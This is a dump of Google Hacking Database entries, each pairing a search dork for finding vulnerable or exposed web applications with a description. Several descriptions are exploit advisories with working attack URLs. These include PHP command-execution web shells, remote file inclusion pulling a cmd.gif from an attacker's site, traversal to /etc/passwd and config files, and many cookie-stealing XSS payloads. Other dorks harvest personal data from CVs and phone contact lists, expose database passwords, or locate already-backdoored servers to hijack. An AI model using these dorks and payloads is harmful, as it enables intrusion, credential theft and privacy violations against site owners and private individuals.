[[descr]This is the login for xams it should catch from 0.0.1-0.0.15<br>
0.0.15 being the latest version as far as I can see their is only versions 0.0.13 0.0.14 and 0.0.15[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22xams+0.0.0..15+-+Login%22&btnG=Google+Search[url]]
[[dork]intitle:"xams 0.0.0..15 - Login"[dork]]
[end][1397]]
[[start][1399]
[[title]"powered by ITWorking"[title]]
[[descr]SaveWebPortal 3.4 remote code execution / admin check bypass / remote file<br>
inclusion / cross site scripting <br>
<br>
author site: http://www.circeos.it<br>
download page: http://www.circeos.it/frontend/index.php?page=downloads<br>
<br>
<br>
a) remote code execution:<br>
<br>
a user can bypass admin check, calling this url:<br>
<br>
http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Source<br>
<br>
now can leave a backdoor in header.php or some other file, example:<br>
<br>
<?php <br>
error_reporting(0);<br>
passtrhu($HTTP_GET_VARS[command]);<br>
?><br>
<br>
after editing template, user can execute arbitrary system commands, through a<br>
url like this:<br>
<br>
http://[target]/saveweb/header.php?command=ls%20-la<br>
<br>
to list directories...<br>
<br>
http://[target]/saveweb/header.php?command=cat%20config.inc.php<br>
<br>
to see database username/password and admin panel username/password <br>
(now attacker have full access to site configuration... can go to<br>
http://[target]/saveweb/admin/<br>
to login...<br>
)<br>
<br>
http://[target]/saveweb/header.php?command=cat%20/etc/passwd<br>
<br>
to see passwd file...<br>
<br>
<br>
b) arbitrary file inclusion:<br>
<br>
a user can view any file on the target server,if not with .php extension:<br>
<br>
http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00<br>
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00<br>
<br>
can execute arbitrary file resident on target server, if with .php extension,<br>
example :<br>
<br>
http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00<br>
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00<br>
<br>
can craft a malicious url to cause victim user to execute commands on external<br>
site:<br>
<br>
http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00<br>
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00<br>
<br>
where cmd.gif is a file like this:<br>
<br>
<?php system('[some command]'); ?><br>
<br>
<br>
c) xss:<br>
<br>
c.1)<br>
http://[target]/saveweb/footer.php?TABLE_Width=>alert(document.cookie)<br>
http://[target]/saveweb/footer.php?SITE_Author_Domain=>alert(document.cookie)<br>
http://[target]/saveweb/footer.php?SITE_Author=>alert(document.cookie)<br>
http://[target]/saveweb/footer.php?L_Info=>alert(document.cookie)<br>
http://[target]/saveweb/footer.php?L_Help=>alert(document.cookie)<br>
http://[target]/saveweb/header.php?TABLE_Width=>alert(document.cookie)<br>
http://[target]/saveweb/header.php?L_Visitors=>alert(document.cookie)<br>
http://[target]/saveweb/header.php?count=>alert(document.cookie)<br>
http://[target]/saveweb/header.php?SITE_Logo=">alert(document.cookie)<br>
http://[target]/saveweb/header.php?BANNER_Url=">alert(document.cookie)<br>
<br>
http://[target]/saveweb/header.php?L_Sunday="}alert(document.cookie)<!--<br>
http://[target]/saveweb/header.php?L_Monday="}alert(document.cookie)<!--<br>
and so on...<br>
<br>
http://[target]/saveweb/header.php?L_January="}alert(document.cookie)<!--<br>
http://[target]/saveweb/header.php?L_February="}alert(document.cookie)<!--<br>
and so on...<br>
<br>
http://[target]/saveweb/header.php?IMAGES_Url=">alert(document.cookie)<!--<br>
http://[target]/saveweb/header.php?L_Info=">alert(document.cookie)<!--<br>
http://[target]/saveweb/header.php?L_Help=">alert(document.cookie)<!--<br>
<br>
http://[target]/saveweb/menu_dx.php?L_InsertCorrectly=alert(document.cookie)<br>
http://[target]/saveweb/menu_dx.php?L_MENUDX_Login=alert(document.cookie)<!--<br>
http://[target]/saveweb/menu_dx.php?L_MENUDX_Username=alert(document.cookie)<!--<br>
http://[target]/saveweb/menu_dx.php?L_MENUDX_Password=alert(document.cookie)<!--<br>
http://[target]/saveweb/menu_dx.php?L_Ok=alert(document.cookie)<!--<br>
http://[target]/saveweb/menu_dx.php?IMAGES_Url=">alert(document.cookie)<!--<br>
http://[target]/saveweb/menu_dx.php?L_MENUDX_Registration=">alert(document.cookie)<!--<br>
http://[target]/saveweb/menu_dx.php?BANNER_Url=">alert(document.cookie)<!--<br>
http://[target]/saveweb/menu_dx.php?L_MENUSX_Newsletter=alert(document.cookie)<!--<br>
http://[target]/saveweb/menu_dx.php?L_MENUDX_InsertEMail=alert(document.cookie)<!--<br>
<br>
http://[target]/saveweb/menu_sx.php?L_InsertNOK3Char=");}alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Channels=alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Home=alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Archive=alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_Search=alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_Ok=alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?IMAGES_Url=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Services=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Links=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Newsletter=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Polls=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ECards=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Downloads=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Community=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Forum=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Chat=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Nicknames=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Membership=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Login=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_UserProfile=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_PasswordForgot=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Logout=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Contacts=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Guestbook=">alert(document.cookie)<br>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ContactUs=">alert(document.cookie)<br>
<br>
c.2) a user can inject evil javascript code in HTTP_REFERER and HTTP_USER_AGENT<br>
vars, when admin view logs javascript will be executed<br>
<br>
<br>
googledork: "powered by ITWorking"<br>
<br>
rgod<br>
mail: retrogod at aliceposta it<br>
site: http://rgod.altervista.org<br>
<br>
original advisory: http://rgod.altervista.org/save_yourself_from_savewebportal34.html[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+ITWorking%22+-site%3Aihackstuff.com+-site%3Asecuritytracker.com+-forum+-hacker&btnG=Search[url]]
[[dork]"powered by ITWorking" -site:ihackstuff.com -site:securitytracker.com -forum -hacker[dork]]
[end][1399]]
[[start][1403]
[[title]intitle:"curriculum vitae" filetype:doc[[title]]
[[descr]Hello. 1. It reveals personal datas, often private addresses, phone numbers, e-mails, how many children one has:). Full curriculum vitae. I tried many verions of it:<br>
inurl:"pl" intitle:"curriculum vitae" filetype:doc<br>
inurl:"uk" intitle:"curriculum vitae" filetype:doc<br>
inurl:"nl" intitle:"curriculum vitae" filetype:doc, etc. in order to get national results,<br>
also<br>
intitle:"curriculum vitae" ext:(doc | rtf )<br>
However filetype:doc version gives the most results. <br>
2. You can always do someting with someone phone number, date and place of birth, etc. <br>
I placed this string in the forum, but nobody answered me :(. <br>
Greetings<br>
philY<br>
ps. you have something similar in your GHDB, but different.<br>
"Click here for the Google search ==> "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"<br>
(opens in new window)<br>
Added: Thursday, August 19, 2004<br>
hits: 24771"descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22curriculum+vitae%22+filetype%3Adoc&btnG=Google+Search[url]]
[[dork]intitle:"curriculum vitae" filetype:doc[dork]]
[end][1403]]
[[start][1405]
[[title]"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."[title]]
[[descr]search reveals database errors on vbulletin sites. View the page source and you can get information about the sql query executed, this can help in all manner of ways depending on the query.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&c2coff=1&q=%22There+seems+to+have+been+a+problem+with+the%22+%22+Please+try+again+by+clicking+the+Refresh+button+in+your+web+browser.%22&btnG=Search[url]]
[[dork]"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."[dork]]
[end][1405]]
[[start][1409]
[[title]inurl:csCreatePro.cgi[[title]]
[[descr]Create Pro logon pages.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3AcsCreatePro.cgi&btnG=Google+Search[url]]
[[dork]inurl:csCreatePro.cgi[dork]]
[end][1409]]
[[start][1410]
[[title]"Powered by FUDForum 2.6" -site:fudforum.org -johnny.ihackstuff[[title]]
[[descr]FUDforum is prone to a remote arbitrary PHP file upload vulnerability.<br>
<br>
An attacker can merge an image file with a script file and upload it to an affected server.<br>
<br>
This issue can facilitate unauthorized remote access.<br>
<br>
FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.<br>
<br>
Affected versions:<br>
2.6.15 _ 2.6.14 _ 2.6.13<br>
2.6.12 _ 2.6.10 _ 2.6.9 _ 2.6.8<br>
2.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.3<br>
2.6.2 _ 2.6.1 _ 2.6<br>
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+FUDForum+2.6%22+-site%3Afudforum.org+-johnny.ihackstuff&btnG=Search[url]]
[[dork]"Powered by FUDForum 2.6" -site:fudforum.org -johnny.ihackstuff[dork]]
[end][1410]]
[[start][1411]
[[title]intitle:"Looking Glass v20040427" "When verifying an URL check one of those"[title]]
[[descr]Looking Glass v20040427 arbitrary commands execution / cross site scripting. <br>
<br>
description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. <br>
<br>
site: http://de-neef.net/articles.php?id=2&page=1<br>
download page: http://de-neef.net/download.php?file=2<br>
<br>
Read the full report here: http://rgod.altervista.org/lookingglass.html[descr]]
[[url]http://www.google.com/search?q=intitle:%22Looking+Glass+v20040427%22+%22When+verifying+an+URL+check+one+of+those%22+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Looking Glass v20040427" "When verifying an URL check one of those" [dork]]
[end][1411]]
[[start][1414]
[[title]contacts ext:wml[[title]]
[[descr]Forget Bluetooth Hacking! You'll be amazed, at how many people sync their Cell Phones to the same Computers they run some type of Server on. <br>
<br>
This Query literally gives you access to peoples private contact lists that are ether on there Smart Phones', or on their Windows CE wireless devices.<br>
<br>
An attacker could Spoof Emails with the "SIG" details of the persons Phone firmware, or simply collect the cellular numbers for something later on down the road.<br>
<br>
I even hypotheticlly came across some private text messages![descr]]
[[url]http://www.google.com/search?hl=en&q=contacts+ext%3Awml+&btnG=Google+Search[url]]
[[dork]contacts ext:wml [dork]]
[end][1414]]
[[start][1416]
[[title]intitle:"NetCam Live Image" -.edu -.gov -johnny.ihackstuff.com[[title]]
[[descr]This is a googledork for StarDot netcams. You can watch these cams and if you have the admin password you can change configurations and other settings. They have a default admin name/pass but I haven't taken the time to figure it out.[descr]]
[[url]http://www.google.com/search?q=intitle:%22NetCam+Live+Image%22+-.edu+-.gov+-johnny.ihackstuff.com&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"NetCam Live Image" -.edu -.gov -johnny.ihackstuff.com[dork]]
[end][1416]]
[[start][1417]
[[title]intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff[[title]]
[[descr]iCMS - Content Management System...<br>
Create websites without knowing HTML or web programming. [descr]]
[[url]http://www.google.com/search?q=intitle:%22Content+Management+System%22+%22user+name%22%7C%22password%22%7C%22admin%22+%22Microsoft+IE+5.5%22+-mambo+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff[dork]]
[end][1417]]
[[start][1418]
[[title]phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)[[title]]
[[descr]phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,remote code execution, cross site scripting<br>
<br>
software:<br>
author site: http://phpldapadmin.sourceforge.net/<br>
description: phpLDAPadmin is a web-based LDAP client. It provides easy,<br>
anywhere-accessible, multi-language administration for your LDAP server<br>
<br>
If unpatched and vulnerable, a user can see any file on target system. A user can also execute arbitrary php code and system commands or craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser.<br>
<br>
<br>
[descr]]
[[url]http://www.google.com/search?q=phpLDAPadmin+intitle%3AphpLDAPadmin+filetype%3Aphp+inurl%3Atree.php+%7C+inurl%3Alogin.php+%7C+inurl%3Adonate.php+%280.9.6+%7C+0.9.7%29[url]]
[[dork]phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)[dork]]
[end][1418]]
[[start][1419]
[[title]intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"[title]]
[[descr]Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.<br>
<br>
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.[descr]]
[[url]http://www.google.com/search?q=intitle:guestbook+inurl:guestbook+%22powered+by++Advanced+guestbook+2.*%22+%22Sign+the+Guestbook%22&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"[dork]]
[end][1419]]
[[start][1420]
[[title]intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin[[title]]
[[descr]qmail mail admin login pages.<br>
<br>
There are several vulnerabilities relating to this software<br>
<br>
[descr]]
[[url]http://www.google.com/search?q=intext:%22Master+Account%22++%22Domain+Name%22+%22Password%22+inurl:/cgi-bin/qmailadmin+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin [dork]]
[end][1420]]
[[start][1421]
[[title]intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org -johnny.ihackstuff[[title]]
[[descr]Web-cyradm is a software that glues topnotch mailing technologies together. The focus is on administrating small and large mailing environments.<br>
<br>
Web-cyradm is used by many different users. At the low end this are homeusers which are providing mailadresses to their family. On the mid to top end users are SME enterprises, educational and other organizations.<br>
<br>
The software on which web-cyradm relies on is completely free and opensource software. So you get the maximung flexibility which the lowest TCO.<br>
<br>
[descr]]
[[url]http://www.google.com/search?q=intitle:%22web-cyradm%22%7C%22by+Luc+de+Louw%22+%22This+is+only+for+authorized+users%22+-tar.gz+-site:web-cyradm.org+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org -johnny.ihackstuff[dork]]
[end][1421]]
[[start][1422]
[[title]"Powered by FUDForum 2.7" -site:fudforum.org -johnny.ihackstuff[[title]]
[[descr]FUDforum is prone to a remote arbitrary PHP file upload vulnerability.<br>
<br>
An attacker can merge an image file with a script file and upload it to an affected server.<br>
<br>
This issue can facilitate unauthorized remote access.<br>
<br>
FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.<br>
<br>
Affected versions:<br>
2.7[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Powered+by+FUDForum+2.7%22+-site%3Afudforum.org+-johnny.ihackstuff&btnG=Search[url]]
[[dork]"Powered by FUDForum 2.7" -site:fudforum.org -johnny.ihackstuff[dork]]
[end][1422]]
[[start][1423]
[[title]"You have requested to access the management functions" -.edu[[title]]
[[descr]Terracotta web manager admin login portal.[descr]]
[[url]http://www.google.com/search?q=%22You+have+requested+to+access+the+management+functions%22++-.edu&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]"You have requested to access the management functions" -.edu[dork]]
[end][1423]]
[[start][1424]
[[title]"Please authenticate yourself to get access to the management interface"[title]]
[[descr]Photo gallery managment system login[descr]]
[[url]http://www.google.com/search?num=100&q=%22Please+authenticate+yourself+to+get+access+to+the+management+interface%22&btnG=Search[url]]
[[dork]"Please authenticate yourself to get access to the management interface"[dork]]
[end][1424]]
[[start][1425]
[[title]ext:inc "pwd=" "UID="[title]]
[[descr]Database connection strings including passwords[descr]]
[[url]http://www.google.com/search?hl=en&q=ext%3Ainc+%22pwd%3D%22+%22UID%3D%22&btnG=Google+Search[url]]
[[dork]ext:inc "pwd=" "UID="[dork]]
[end][1425]]
[[start][1426]
[[title]inurl:chitchat.php "choose graphic"[title]]
[[descr]rgod advises:<br>
<br>
Cyber-Cats ChitCHat 2.0 permit cross site scripting attacks, let users launch exploits from, let remote users obtain informations on target users, let insecurely delete/create files. This search does not find vulnerable versions, only generic.<br>
<br>
software:<br>
site: http://www.cyber-cats.com/php/<br>
<br>
<br>
rgod<br>
site: http://rgod.altervista.org<br>
mail: retrogod@aliceposta.it[/code][descr]]
[[url]http://www.google.com/search?hl=it&q=inurl%3Achitchat.php+%22choose+graphic%22&btnG=Cerca+con+Google&meta=[url]]
[[dork]inurl:chitchat.php "choose graphic"[dork]]
[end][1426]]
[[start][1427]
[[title]"Calendar programming by AppIdeas.com" filetype:php[[title]]
[[descr]phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting This search does not narrow to vulnerable versions.<br>
<br>
software:<br>
site: http://open.appideas.com<br>
download: http://open.appideas.com/Calendar/<br>
<br>
original advisory: http://rgod.altervista.org/phpccal.html<br>
[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Calendar+programming+by+AppIdeas.com%22+filetype%3Aphp&btnG=Cerca+con+Google&meta=[url]]
[[dork]"Calendar programming by AppIdeas.com" filetype:php[dork]]
[end][1427]]
[[start][1428]
[[title]"Powered by MD-Pro" | "made with MD-Pro"[title]]
[[descr]MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution<br>
/ cross site scripting / path disclosure<br>
. This search does not find vulnerable versions.<br>
<br>
software:<br>
site: http://www.maxdev.com/<br>
description: http://www.maxdev.com/AboutMD.phtml<br>
<br>
<br>
original advisory: http://rgod.altervista.org/maxdev1073.html<br>
<br>
[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+MD-Pro%22+%7C+%22made+with+MD-Pro%22&start=0&start=0[url]]
[[dork]"Powered by MD-Pro" | "made with MD-Pro"[dork]]
[end][1428]]
[[start][1429]
[[title]"Software PBLang" 4.65 filetype:php[[title]]
[[descr]my advisory:<br>
<br>
[quote]<br>
PBLang 4.65 (possibly prior versions) remote code execution / administrative<br>
credentials disclosure / system information disclosure / cross site scripting /<br>
path disclosure<br>
<br>
software:<br>
<br>
description: PBLang is a powerful flatfile Bulletin Board System. It combines<br>
many features of a professional board, but does not even require SQL support. It<br>
is completely based on text-file.<br>
<br>
site: http://pblang.drmartinus.de/<br>
download: https://sourceforge.net/project/showfiles.php?group_id=62953<br>
<br>
1) system disclosure:<br>
<br>
you can traverse directories and see any file (if not .php or .php3 etc.) and<br>
include any file on target system using '../' chars and null byte (%00), example:<br>
<br>
http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00<br>
<br>
vulnerable code in setcookie.php:<br>
<br>
...<br>
16 $usrname=$HTTP_GET_VARS['u'];<br>
17 @include($dbpath.'/'.$usrname.'temp');<br>
...<br>
<br>
2) remote code execution:<br>
<br>
board stores data in files, when you register a [username] file without extension<br>
is created in /db/members directory, inside we have php code executed when you<br>
login, so in location field type:<br>
<br>
madrid"; system($HTTP_POST_VARS[cmd]); echo "<br>
<br>
in /db/members/[username] file we have<br>
<br>
...<br>
$userlocation="madrid"; system($HTTP_GET_VARS[cmd]); echo "";<br>
...<br>
<br>
no way to access the script directly, /db/members is .htaccess protected<br>
and extra lines are deleted from files after you login, so you should make<br>
all in a POST request and re-register<br>
<br>
this is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]%00&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum:<br>
<br>
http://rgod.altervista.org/pblang465.html <br>
<br>
3)admin/user credentials disclosure:<br>
<br>
you can see password hash of any user or admin sending the command:<br>
<br>
cat ./db/members/[username]<br>
<br>
<br>
4) cross site scripting:<br>
<br>
register and in location field type:<br>
<br>
madrid"; echo "alert(document.cookie)<br>
<br>
then check this url:<br>
<br>
http://[target]/[path]/setcookie.php?u=[username]%00<br>
<br>
<br>
5) path disclosure:<br>
<br>
http://[target]/[path]/setcookie.php?u=%00<br>
<br>
<br>
googledork: "Software PBLang" filetype:php<br>
<br>
rgod<br>
site: http://rgod.altervista.org<br>
mail: retrogod@aliceposta.it<br>
original advisory: http://rgod.altervista.org/pblang465.html<br>
[/quote]<br>
<br>
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Software+PBLang%22+4.65+filetype%3Aphp[url]]
[[dork]"Software PBLang" 4.65 filetype:php[dork]]
[end][1429]]
[[start][1430]
[[title]"Powered by and copyright class-1" 0.24.4[[title]]
[[descr]class-1 Forum Software v 0.24.4 Remote code execution<br>
<br>
software: <br>
site: http://www.class1web.co.uk/software<br>
<br>
description: <br>
<br>
class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributed<br>
under the GNU General Public License which means that its source is freely-distributed<br>
and available to the general public. <br>
<br>
vulnerability: the way the forum checks attachment extensions...<br>
look at the vulnerable code at viewforum.php 256-272 lines.<br>
<br>
<br>
nothing seems so strange, but... what happen if you try to upload a file<br>
with this name? :<br>
<br>
shell.php.' or 'a' ='a<br>
<br>
;)<br>
<br>
[1] SQL INJECTION!<br>
<br>
The query and other queries like this become:<br>
<br>
SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'<br>
<br>
you have bypassed the check... now an executable file is uploaded, because for Apache, both<br>
on Windows and Linux a file with that name is an executable php file...<br>
<br>
you can download a poc file from my site, at url:<br>
<br>
http://rgod.altervista.org/shell.zip<br>
<br>
inside we have:<br>
<br>
<?php error_reporting(0); system($HTTP_GET_VARS[command]); ?><br>
<br>
you can do test manually, unzip the file, register, login, post this file as attachment, then<br>
go to this url to see the directory where the attachment has been uploaded:<br>
<br>
http://[target]/[path]/viewattach.php<br>
<br>
you will be redirected to:<br>
<br>
http://[target]/[path]/[upload_dir]/<br>
<br>
then launch commands:<br>
<br>
http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwd<br>
<br>
to see /etc/passwd file<br>
<br>
http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.inc<br>
<br>
to see database username and password<br>
and so on...<br>
<br>
you can see my poc exploit at this url:<br>
<br>
http://www.rgod.altervista.org/class1.html<br>
<br>
googledork: "Powered by and copyright class-1"<br>
<br>
rgod<br>
site: http://rgod.altervista.org<br>
mail: retrogod [at] aliceposta . it<br>
<br>
<br>
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+and+copyright+class-1%22++0.24.4&num=50[url]]
[[dork]"Powered by and copyright class-1" 0.24.4[dork]]
[end][1430]]
[[start][1431]
[[title]"Powered by Xcomic"[title]]
[[descr]"Powered by xcomic"<br>
<br>
this is a recent exploit, you can retrieve any file on target system<br>
by using "../" chars and null byte (%00), example:<br>
<br>
http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00<br>
<br>
or launch commands:<br>
<br>
http://target/path_to_xcomic/initiailze.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00<br>
<br>
where cmd.gif is a file like this:<br>
<br>
<?php error_reporting(0); system($_GET[command]); ?><br>
<br>
I have read an advisory copy here: http://forum.ccteam.ru/archive/index.php/t-57.html[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Powered+by+Xcomic%22+&btnG=Cerca+con+Google&meta=[url]]
[[dork]"Powered by Xcomic" [dork]]
[end][1431]]
[[start][1432]
[[title]rdbqds -site:.edu -site:.mil -site:.gov[[title]]
[[descr]Ceasar encryption is a rather simple encryption. You simply shift letters up or down across the entire length of the message... In the url I did this with the word "secret" which equals rdbqds.. (1 char shift).<br>
<br>
It appears that protected PDF documents use this very encryption to protect its documents. At least one version of adobe acrobat did. <br>
<br>
A big thank you to Golfo for the links he provided in the forum to assist.<br>
<br>
http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.html <br>
http://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html<br>
<br>
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=rdbqds+-site%3A.edu+-site%3A.mil+-site%3A.gov[url]]
[[dork]rdbqds -site:.edu -site:.mil -site:.gov[dork]]
[end][1432]]
[[start][1433]
[[title]"Warning:" "Cannot execute a blank command in"[title]]
[[descr]"Warning: passthru(): Cannot execute a blank command in" <br>
"Warning: system(): Cannot execute a blank command in" <br>
"Warning: exec(): Cannot execute a blank command in" <br>
<br>
generally: <br>
<br>
"Warning:" "Cannot execute a blank command in" <br>
<br>
this a php error message, essentially it shows hacked pages links <br>
where someone leaved a backdoor and the page has error_reporting not set to 0... <br>
you can execute shell commands simply appending a var, guessing variable name, usually <br>
'cmd' or 'command' or something else, example: <br>
<br>
http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Warning%3A%22+%22Cannot+execute+a+blank+command+in%22&meta=[url]]
[[dork]"Warning:" "Cannot execute a blank command in"[dork]]
[end][1433]]
[[start][1434]
[[title]"Mail-it Now!" intitle:"Contact form" | inurl:contact.php[[title]]
[[descr]Mail-it Now! 1.5 (possibly prior versions) contact.php remote code execution<br>
<br>
site: http://www.skyminds.net/source/<br>
description: a mail form script<br>
<br>
<br>
vulnerability: unsecure file creation -> remote code execution<br>
<br>
when you post an attachment and upload it to the server (usually to "./upload/" dir )<br>
the script rename the file in this way:<br>
[time() function result] + [-] + [filename that user choose]<br>
spaces are simply replaced with "_" chars.<br>
So a user can post an executable attachment, calculate the time() result locally<br>
then, if attachment is a file like this:<br>
<br>
<?php error_reporting(0); system($HTTP_GET_VARS[command]); ?><br>
<br>
can launch commands on target system, example:<br>
<br>
http://[target]/[path]/[time() result]-[filename.php]?command=cat%20/etc/passwd<br>
<br>
u can find my poc code at this url: http://rgod.altervista.org/mailitnow.html<br>
<br>
[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Mail-it+Now%21%22+intitle%3A%22Contact+form%22+%7C+inurl%3Acontact.php[url]]
[[dork]"Mail-it Now!" intitle:"Contact form" | inurl:contact.php[dork]]
[end][1434]]
[[start][1435]
[[title]"maxwebportal" inurl:"default" "snitz forums" +"homepage" -intitle:maxwebportal[[title]]
[[descr]Several vulnerabilities relating to this.<br>
<br>
MaxWebPortal is a web portal and online community system which includes features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. User interface allows members to add news, content, write reviews and share information among other registered users.<br>
<br>
h**p://www.maxwebportal.com/[descr]]
[[url]http://www.google.com/search?hl=en&q=%22maxwebportal%22+inurl%3A%22default%22+%22snitz+forums%22+%2B%22homepage%22+-intitle%3Amaxwebportal[url]]
[[dork]"maxwebportal" inurl:"default" "snitz forums" +"homepage" -intitle:maxwebportal[dork]]
[end][1435]]
[[start][1436]
[[title]"Powered by AzDg" (2.1.3 | 2.1.2 | 2.1.1)[[title]]
[[descr]AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution <br>
<br>
software: <br>
site: http://www.azdg.com/ <br>
download page: http://www.azdg.com/scripts.php?l=english <br>
description:" AzDGDatingLite is a Free dating script working on PHP and MySQL. <br>
Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, <br>
Very customizable " etc. <br>
<br>
vulnerability: <br>
<br>
look at the vulnerable code in ./include/security.inc.php at lines ~80-90 <br>
<br>
... <br>
else <br>
{ <br>
if (isset($l) && file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') <br>
{ <br>
include_once C_PATH.'/languages/'.$l.'/'.$l.'.php'; <br>
include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php'; <br>
} <br>
... <br>
<br>
you can include arbitrary file on the server using "../" and null byte (%00) (to truncate path to <br>
the filename you choose), example: <br>
<br>
http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 <br>
<br>
